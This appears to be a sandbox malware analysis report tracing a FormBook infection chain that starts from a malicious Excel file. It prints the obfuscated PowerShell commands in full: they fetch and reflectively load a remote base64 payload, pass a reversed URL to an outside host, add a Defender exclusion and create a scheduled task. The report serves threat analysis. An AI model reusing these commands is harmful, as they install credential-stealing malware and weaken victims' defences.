                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                      Start time:01:14:48
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:543'304 bytes
                                                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                      Start time:01:14:50
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
                                                                                                                                                                                      Imagebase:0x9f0000
                                                                                                                                                                                      File size:141'824 bytes
                                                                                                                                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                      Start time:01:14:50
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                                      File size:427'008 bytes
                                                                                                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                      Start time:01:14:51
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
                                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                                      File size:427'008 bytes
                                                                                                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                      Start time:01:15:00
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                                                                                                      Imagebase:0x830000
                                                                                                                                                                                      File size:45'160 bytes
                                                                                                                                                                                      MD5 hash:04AA198D72229AEED129DC20201BF030
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                      Start time:01:15:01
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
                                                                                                                                                                                      Imagebase:0xe70000
                                                                                                                                                                                      File size:427'008 bytes
                                                                                                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                      Start time:01:15:01
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"
                                                                                                                                                                                      Imagebase:0x580000
                                                                                                                                                                                      File size:179'712 bytes
                                                                                                                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                      Start time:01:15:03
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                                                                                                      Imagebase:0x830000
                                                                                                                                                                                      File size:45'160 bytes
                                                                                                                                                                                      MD5 hash:04AA198D72229AEED129DC20201BF030
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                      Start time:01:15:03
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                      Imagebase:0xff2f0000
                                                                                                                                                                                      File size:3'229'696 bytes
                                                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000017.00000002.638758536.0000000006123000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                      Start time:01:15:05
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                                                      Imagebase:0xff6a0000
                                                                                                                                                                                      File size:464'384 bytes
                                                                                                                                                                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                      Start time:01:15:05
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\niLILOT.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\niLILOT.exe
                                                                                                                                                                                      Imagebase:0x330000
                                                                                                                                                                                      File size:45'160 bytes
                                                                                                                                                                                      MD5 hash:04AA198D72229AEED129DC20201BF030
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                      Start time:01:15:13
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                                                                                                                                                      Imagebase:0x8d0000
                                                                                                                                                                                      File size:1'068'544 bytes
                                                                                                                                                                                      MD5 hash:4676AAA9DDF52A50C829FEDB4EA81E54
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.637544486.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                      Start time:01:15:16
                                                                                                                                                                                      Start date:07/10/2024
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                                                                                                      Imagebase:0x4a2b0000
                                                                                                                                                                                      File size:302'592 bytes
                                                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Call Graph

                                                                                                                                                                                      • Entrypoint
                                                                                                                                                                                      • Decryption Function
                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      • Show Help
                                                                                                                                                                                      callgraph 1 Error: Graph is empty

                                                                                                                                                                                      Module: Sheet1

                                                                                                                                                                                      Declaration
                                                                                                                                                                                      LineContent
                                                                                                                                                                                      1

                                                                                                                                                                                      Attribute VB_Name = "Sheet1"

                                                                                                                                                                                      2

                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                      3

                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                      4

                                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                                      5

                                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                                      6

                                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                                      7

                                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                                      8

                                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                                      Module: Sheet2

                                                                                                                                                                                      Declaration
                                                                                                                                                                                      LineContent
                                                                                                                                                                                      1

                                                                                                                                                                                      Attribute VB_Name = "Sheet2"

                                                                                                                                                                                      2

                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                      3

                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                      4

                                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                                      5

                                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                                      6

                                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                                      7

                                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                                      8

                                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                                      Module: Sheet3

                                                                                                                                                                                      Declaration
                                                                                                                                                                                      LineContent
                                                                                                                                                                                      1

                                                                                                                                                                                      Attribute VB_Name = "Sheet3"

                                                                                                                                                                                      2

                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                                                      3

                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                      4

                                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                                      5

                                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                                      6

                                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                                      7

                                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                                      8

                                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                                      Module: ThisWorkbook

                                                                                                                                                                                      Declaration
                                                                                                                                                                                      LineContent
                                                                                                                                                                                      1

                                                                                                                                                                                      Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                                                      2

                                                                                                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                                                      3

                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False

                                                                                                                                                                                      4

                                                                                                                                                                                      Attribute VB_Creatable = False

                                                                                                                                                                                      5

                                                                                                                                                                                      Attribute VB_PredeclaredId = True

                                                                                                                                                                                      6

                                                                                                                                                                                      Attribute VB_Exposed = True

                                                                                                                                                                                      7

                                                                                                                                                                                      Attribute VB_TemplateDerived = False

                                                                                                                                                                                      8

                                                                                                                                                                                      Attribute VB_Customizable = True

                                                                                                                                                                                      Reset < >
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000C.00000002.497320979.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 10e788f55ae582a4ecb6084cd3fa493bb0e3801431cbfacc841f3df97fe216dc
                                                                                                                                                                                        • Instruction ID: c960cb0bac30cdebb89b2c7f557f1e794db868d973ef94fcd01ca048e5f08e4e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e788f55ae582a4ecb6084cd3fa493bb0e3801431cbfacc841f3df97fe216dc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 08018471504240AAE7144A15DC84B67BB98DFC1724F18C556EC494B382C3799D45CAB1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000C.00000002.497320979.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_1dd000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 5f607eb28821839fef34733fa012bba2cff3a8fb74dc9deb2a5ccab44514e2d9
                                                                                                                                                                                        • Instruction ID: 2b21102771c4469b4a7d4d82610769003f457d9536b40c33bacb2e79abf23c02
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f607eb28821839fef34733fa012bba2cff3a8fb74dc9deb2a5ccab44514e2d9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2601526140D3C09FD7128B259C94B56BFB4DF52224F19C1DBE8888F293C2699C45C772

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:10%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                        Total number of Nodes:31
                                                                                                                                                                                        Total number of Limit Nodes:5
                                                                                                                                                                                        execution_graph 9785 3706f4 9786 370728 9785->9786 9787 37076d 9786->9787 9791 255730 9786->9791 9795 255760 9786->9795 9788 3709d3 9793 255773 9791->9793 9792 2557b4 9792->9788 9793->9792 9799 256a07 9793->9799 9797 255773 9795->9797 9796 2557b4 9796->9788 9797->9796 9798 256a07 2 API calls 9797->9798 9798->9797 9801 256a29 9799->9801 9800 256a81 9800->9793 9801->9800 9804 257528 ResumeThread 9801->9804 9806 2575d8 9801->9806 9805 256f51 9804->9805 9805->9801 9807 2575e6 9806->9807 9808 257528 ResumeThread 9807->9808 9809 256f51 9807->9809 9808->9809 9809->9801 9810 257e40 9811 257e82 9810->9811 9812 257e8c Wow64SetThreadContext 9810->9812 9811->9812 9813 257eba 9812->9813 9814 257c00 9815 257c7b CreateProcessW 9814->9815 9817 257d59 9815->9817 9818 257fb8 9819 258000 9818->9819 9820 258008 WriteProcessMemory 9818->9820 9819->9820 9821 258043 9820->9821
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000000F.00000002.479562737.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_15_2_370000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $;)$$;)$(:)$(:)$(:)$H;)$H;)$H;)$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:)$L:)$L:)
                                                                                                                                                                                        • API String ID: 0-3668502325
                                                                                                                                                                                        • Opcode ID: a2a831a0c1926d7a93ad5b1b0aaf3b6473bf1845ca1d29e10d95be350825505a
                                                                                                                                                                                        • Instruction ID: b6b2ee525dfafa71c644da3505e8a76bcb645c72e01a8282d8425f9083167f49
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2a831a0c1926d7a93ad5b1b0aaf3b6473bf1845ca1d29e10d95be350825505a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D035D34A00215EFDB65DF64C850AAAF7B2FF89310F14C5AAD819AB351CB31AD42CF91

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
